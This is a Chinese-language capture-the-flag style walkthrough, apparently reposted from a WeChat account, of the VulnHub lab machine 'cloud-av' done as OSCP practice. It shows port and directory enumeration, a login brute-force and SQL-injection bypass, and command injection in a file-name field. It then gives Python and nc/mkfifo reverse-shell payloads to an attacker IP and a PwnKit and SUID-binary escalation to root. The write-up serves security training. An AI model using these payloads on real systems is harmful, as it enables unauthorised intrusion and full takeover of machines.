坚持自律做最好的自己,每天一台,欢迎大家监督
0-前言
打靶实战思路主要参考OSCP | 教材小结
对于教材内容不熟悉的同学可以参考OSCP | 教材笔记汇总下载
在靶机实战中每一步操作涉及教材内容的,我都会标注章节号,遇到不熟悉的部分随时回看教材笔记
1-环境搭建
靶机下载地址:
https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/kali镜像:
kali-linux-2024.2-virtualbox-amd64虚拟机环境:
Oracle VM VirtualBox 7.0网络:
kali和靶机都选“仅主机(Host-Only)网络”先启动kali,再启动靶机,因为上一台靶机分的是102的ip,所以这次是103kali的IP是192.168.56.101靶机的IP是192.168.56.103
2-靶机实战
2-1-扫描枚举
端口扫描,命令参考“OSCP | 信息收集”章节的“6.3 主动信息收集”
sudo nmap -p 1-65535 192.168.56.103Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-11 21:33 EDTNmap scan report for 192.168.56.103Host is up (0.000094s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICEopen sshopen http-proxyMAC Address: 08:00:27:49:74:E2 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 15.31 seconds
发现22和8080端口开放,服务枚举,命令参考“OSCP | 信息收集”章节的“6.3 主动信息收集”
sudo nmap -p22,8080 -sT -A 192.168.56.103Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-11 21:35 EDTNmap scan report for 192.168.56.103Host is up (0.00041s latency).PORT STATE SERVICE VERSIONopen ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)ssh-hostkey:2048 6a:42:4b:7c:2a:06:0f:50:4b:32:cf:b8:31:e9:c4:f4 (RSA)256 81:c7:60:0f:d7:1e:56:f7:a3:1e:9f:76:27:bd:31:27 (ECDSA)256 71:90:c3:26:ba:3b:e8:b3:53:7e:73:53:27:4d:6b:af (ED25519)open http Werkzeug httpd 0.14.1 (Python 2.7.15rc1): Werkzeug/0.14.1 Python/2.7.15rc1: Site doesn't have a title (text/html; charset=utf-8).MAC Address: 08:00:27:49:74:E2 (Oracle VirtualBox virtual NIC)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purposeRunning: Linux 3.X|4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2 - 4.9Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTEHOP RTT ADDRESS1 0.41 ms 192.168.56.103OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 21.21 seconds
22端口为SSH服务,版本是OpenSSH 7.6p1,搜索可利用漏洞无果
8080端口是HTTP服务,版本是Werkzeug,是基于python的web应用,浏览器打开是一个“Cloud Anti-Virus Scanner!”杀毒扫描工具页面,但是需要验证码登录
遇到web应用,一般常见思路:
1-路径猜解,使用gobuster挂字典破解
命令参考“OSCP | WEB攻击简介”章节的“8.2.3 目录枚举”
gobuster dir -u http://192.168.56.103:8080 -w /usr/share/wordlists/dirb/common.txt -t 5===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[] Url: http://192.168.56.103:8080[] Method: GET[] Threads: 5[] Wordlist: /usr/share/wordlists/dirb/common.txt[] Negative Status codes: 404[] User Agent: gobuster/3.6[] Timeout: 10s===============================================================Starting gobuster in directory enumeration mode===============================================================/console (Status: 200) [Size: 1985]/login (Status: 405) [Size: 178]/output (Status: 405) [Size: 178]/scan (Status: 200) [Size: 48]Progress: 4614 / 4615 (99.98%)===============================================================Finished===============================================================
逐个访问4个路径,未发现可进一步利用漏洞
2-验证码破解,使用burp挂字典破解
burp抓包,操作参考“OSCP | WEB攻击简介”章节的“8.2 Web分析工具”
POST /login HTTP/1.1Host: 192.168.56.103:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 13Origin: http://192.168.56.103:8080Connection: closeReferer: http://192.168.56.103:8080/Cookie: session=eyJsb2dnZWRfaW4iOnRydWV9.ZpCLIQ.mVWTHQcV5rGEfPXHEKjmfhHQC1oUpgrade-Insecure-Requests: 1password=test
password参数挂/usr/share/set/src/fasttrack/wordlist.txt字典爆破
获得密码是password
3-web漏洞,如SQL注入、命令注入等
尝试SQL注入可绕过,验证码如下:
"or""="方法2和3都可以登录进入http://192.168.56.103:8080/scan页面
2-2-漏洞利用
目测是个文本框和一个按钮,看页面应该是输入文件名,然后页面返回病毒扫描结果
猜测一下应该是输入文件名后,系会调用杀毒程序进行扫描,然后返回结果,我们输入的参数是文件名
文件名拼接容易产生命令注入漏洞,操作参考“OSCP | 通用WEB攻击”章节的“9.4 命令执行”
文件名输入
hello | iduid=1001(scanner) gid=1001(scanner) groups=1001(scanner)
发现命令可以执行,使用https://revshells.com生成payload
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'文件名输入
hello | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'kali上监听443端口,获得shell
nc -lvnp 443listening on [any] 443 ...connect to [192.168.56.101] from (UNKNOWN) [192.168.56.103] 60708$ ididuid=1001(scanner) gid=1001(scanner) groups=1001(scanner)$
3-权限提升
3-1-提权枚举
上传linpeas.sh运行,,命令参考“OSCP | Linux提权”章节的“17.1.3 自动枚举”
cd /tmpwget http://192.168.56.101/linpeas.shchmod +x ./linpeas.sh./linpeas.sh
发现提示
Executing Linux Exploit Suggesterhttps://github.com/mzet-/linux-exploit-suggestercat: write error: Broken pipecat: write error: Broken pipecat: write error: Broken pipecat: write error: Broken pipecat: write error: Broken pipe[CVE-2021-4034] PwnKitDetails: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txtExposure: probableTags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaroDownload URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
3-2-提权利用
这里我使用的是[CVE-2021-4034] PwnKit(https://github.com/ly4k/PwnKit)
wget http://192.168.56.101/PwnKitchmod +x ./PwnKitiduid=0(root) gid=0(root) groups=0(root)
还有另外一种提权方法,linpeas.sh结果中发现
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════╚════════════════════════════════════╝╔══════════╣ SUID - Check easy privesc, exploits and write perms╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid-rwsr-xr-- 1 root messagebus 42K Nov 15 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper-rwsr-sr-x 1 root root 99K Jul 19 2018 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device-rwsr-xr-x 1 root root 427K Feb 10 2018 /usr/lib/openssh/ssh-keysign-rwsr-xr-x 1 root root 14K Jul 13 2018 /usr/lib/policykit-1/polkit-agent-helper-1-rwsr-xr-x 1 root root 79K Aug 1 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic-rwsr-xr-x 1 root root 22K Jul 13 2018 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)-rwsr-xr-x 1 root root 19K Mar 9 2017 /usr/bin/traceroute6.iputils-rwsr-xr-x 1 root root 59K Jan 25 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)-rwsr-xr-x 1 root root 37K Jan 25 2018 /usr/bin/newgidmap-rwsr-xr-x 1 root root 37K Jan 25 2018 /usr/bin/newuidmap-rwsr-xr-x 1 root root 44K Jan 25 2018 /usr/bin/chsh-rwsr-xr-x 1 root root 75K Jan 25 2018 /usr/bin/gpasswd-rwsr-xr-x 1 root root 40K Jan 25 2018 /usr/bin/newgrp ---> HP-UX_10.20-rwsr-xr-x 1 root root 75K Jan 25 2018 /usr/bin/chfn ---> SuSE_9.3/10-rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)-rwsr-xr-x 1 root root 146K Jan 18 2018 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable-rwsr-xr-x 1 root scanner 8.4K Oct 24 2018 /home/scanner/update_cloudav (Unknown SUID binary!)
/home/scanner/update_cloudav具备suid权限,且不是系统自带程序,进入该目录查看文件
ls -ltotal 20drwxrwxr-x 4 scanner scanner 4096 Oct 24 2018 cloudav_app-rwsr-xr-x 1 root scanner 8576 Oct 24 2018 update_cloudav-rw-rw-r-- 1 scanner scanner 393 Oct 24 2018 update_cloudav.c$ cat update_cloudav.ccat update_cloudav.cint main(int argc, char *argv[]){char *freshclam="/usr/bin/freshclam";if (argc < 2){printf("This tool lets you update antivirus rulesnPlease supply command line arguments for freshclamn");return 1;}char *command = malloc(strlen(freshclam) + strlen(argv[1]) + 2);sprintf(command, "%s %s", freshclam, argv[1]);setgid(0);setuid(0);system(command);return 0;}
update_cloudav程序会调用/usr/bin/freshclam,然后加一个参数,可以猜测命令注入
./update_cloudav "test | id"uid=0(root) gid=0(root) groups=0(root),1001(scanner)ERROR: Problem with internal logger (UpdateLogFile = /var/log/clamav/freshclam.log).$
确实可以root执行命令,使用https://revshells.com生成payload,如果不成功就多换几个试试
./update_cloudav "test | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.56.101 1337 >/tmp/f"kali监听1337端口,获得root权限shell
nc -lvnp 1337listening on [any] 1337 ...connect to [192.168.56.101] from (UNKNOWN) [192.168.56.103] 37142# iduid=0(root) gid=0(root) groups=0(root),1001(scanner)
打完收工
方法不止一种,各位小伙伴可以多多尝试
如有好的靶机欢迎后台留言推荐
或者小伙伴有靶机实战笔记也可后台发我分享哈
坚持自律做最好的自己
原文始发于微信公众号(高级红队专家):OSCP实战靶机 | cloudantivirus
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论